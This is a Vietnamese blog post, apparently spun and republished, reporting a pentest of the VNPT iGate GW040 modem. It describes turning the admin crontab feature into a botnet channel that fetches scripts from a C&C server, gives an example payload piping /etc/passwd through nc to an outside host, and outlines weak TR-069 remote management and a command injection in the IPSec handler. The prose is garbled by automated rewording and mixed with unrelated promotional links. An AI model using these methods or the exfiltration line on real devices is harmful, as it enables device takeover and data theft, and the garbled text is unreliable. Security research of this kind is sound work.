Về cơ bản đây là 1 mẫu sản phẩm của người Việt làm ra, bọn mình thực thi pentest không vì bất kỳ mục đích xấu nào ngoài mục tiêu muốn mẫu sản phẩm được ngày càng tốt lên .
Bài này mình đã tiến hành nhanh từ hồi cuối tháng 10/2017 từ 1 lời thử thách của ông anh trong team ( Các bạn trọn vẹn hoàn toàn có thể đọc qua một chút ít thông tin trước tại đây : https://linkshay.com/a-quick-look-at-igate-gw040-gpon-ont-from-vnpt-e84030bb8699 ) tuy nhiên do có 1 vài yếu tố về policy mà đến giờ mới public được. Đang xem : Cập nhật firmware g6Về cơ bản đây là 1 mẫu mẫu sản phẩm của người Việt làm ra, bọn mình thực thi pentest không vì bất kỳ mục đích xấu nào ngoài tiềm năng muốn mẫu loại sản phẩm được ngày càng tốt lên .
Tiếng sét ái tình từ cái nhìn đầu tiên
Theo kinh nghiệm tay nghề kinh nghiệm tay nghề bản thân thử lượn lờ vào trang quản trị xem có đoạn nào khả dĩ trọn vẹn hoàn toàn có thể tương tác được với OS hay không, lướt nhanh 1 cái thấy ngay tính năng này .
Không rõ mục tiêu của những bạn tăng trưởng như thế nào nhưng qua tính năng này thật quá đơn thuần để tạo botnet mà chẳng cần mất công code, tận dụng tính năng crontab này mình hoàn toàn có thể setup nhu yếu thiết bị định kỳ connect back về server lấy 1 đoạn script và chạy nó. Như ở trên là mình thử đặt cứ 1 phút 1 lần lên trang C&C lấy và chạy file a .
VD nội dung file a :
Cat / etc / passwd | nc c.and. c 77
Thì sẽ được :
Quản trị hay bị quản trị ?
Dò tiếp 1 chút thì thấy tính năng Tr069 :
Đây là công dụng cho phép nhà mạng quản trị thiết bị từ xa ( theo dõi thông số kỹ thuật hoạt đông, tăng cấp, thông số kỹ thuật … )
Có 3 yếu tố ở công dụng này :
– Server không sử dụng https .
– Thiết bị không xác nhận server .
– Người dùng có quyền thông số kỹ thuật địa chỉ ACS server ( chả hiểu có ông người mua nào có nhu yếu tự dựng server quản trị riêng hay không ) .
Kết hợp cả 3 yếu tố thì tính năng này không khác gì công dụng crontab ở bên trên, nghĩa là nếu bị hack thì thiết bị trọn vẹn hoàn toàn có thể bị trỏ về ACS của hacker và biến modem trở thành bot .
Xem thêm : Top 10 Thức Ăn Tốt Nhất Cho Chó Giá Rẻ, Just A Moment
Phân tích binary
Các bạn hoàn toàn có thể tải firmware tại
https://linkshay.comvnpt.toptotnhat.comspot.com/2017/02/cap-nhat-firmware-g616a04rtm-update.html
sử dụng binwalk để extrart firmware :
Firmware sử dụng định dạng ubifs ( read only file system ) và 1 vùng jffs2 chắc để lưu volatile variables .
Sau khi extrart duyệt qua filesystem 1 chút, lấy được file / bin / httpd .
Hơi giật mình khi biên dịch ngược code những bạn có enable cờ bảo vệ stack, chắc cũng đã được apply 1 cái coding convention nào đấy rồi, hơn hẳn mấy con modem tàu mình nghịch trước đây => very good ! .
Ngồi đọc dạo qua binary 1 vòng phát hiện 1 đoạn code gọi hàm system với tham số truyền từ bên ngoài vào .
Trace ngược lại chút thì đoạn code này được sử dụng cho tính năng IPSec trọn vẹn hoàn toàn có thể trigger bằng request add new ipsec connection .
Chỉnh sửa request :
Xem thêm : Bông Hoa Đỏ
Và hiệu suất cao :
Kết luận:
Đây là một loại mẫu sản phẩm khá tốt và có vẻ như như cũng đã quan tâm đến yếu tố ATTT, tuy nhiên mình có 1 xúc cảm thiết bị chưa thực sự được chú trọng ở khâu phong thái phong cách thiết kế khi chắp vá cóp nhặt những hiệu quả của những thiết bị khác mà không có cái nhìn về mạng lưới mạng lưới hệ thống dẫn đến nhưng lỗi cơ bản về ATTT không đáng có. Hơi đáng tiếc 🙁
toptotnhat.com
It’s all about security
Follow
18
18 claps
18 claps
Written by
TigerPuma
Follow
Follow
toptotnhat.com
Follow
It’s all about security
Follow
Written by
TigerPuma
Follow
toptotnhat.com
Follow
It’s all about security
More From Medium
CVE-2021 – 26833 : Cleartext Storage in a File or on Disk in TimelyBills ≤ 1.7.0
BeeFaauBee
Introducing thin-edge.io !
Andrej Schreiner in thin-edge.io
100 Words On … .. Server Application Hardening
Digitally Vicarious in The 100 Words Project
Running Flutter Apps on Ubuntu Core
Buğra Aydoğar in Nerd For Tech
100 Words On … .. Sandboxing
Digitally Vicarious in The 100 Words Project
The Simple 40 Minute Morning Routine That Completely Changed My Life
Ashley Richmond in Change Your Mind Change Your Life
5 Underrated Reasons a Man Leaves a Good Woman
Leah Njoki in Hello, Love
The Children of the 7 Most Powerful Nazi Leaders
Peter Preskar in History of Yesterday
Xem thêm: (Review) Top 5 Tai Nghe Bluetooth Pin Lâu Nhất 2021, Tai Nghe Bluetooth Nào Pin Lâu – Links Hay
Learn more .
Medium is an open platform where 170 million readers come to find insightful and dynamic thinking. Here, expert and undiscovered voices alike dive into the heart of any topic and bring new ideas to the surface. Learn more
Make Medium yours .Xem thêm : vieệc làm tốt nhất
Follow the writers, publications, and topics that matter to you, and you’ll see them on your homepage and in your inbox. Explore
Share your thinking .
If you have a story to tell, knowledge to share, or a perspective to offer — welcome home. It’s easy and không lấy phí to post your thinking on any topic. Write on Medium
Source: https://linkshay.com
Category: Review
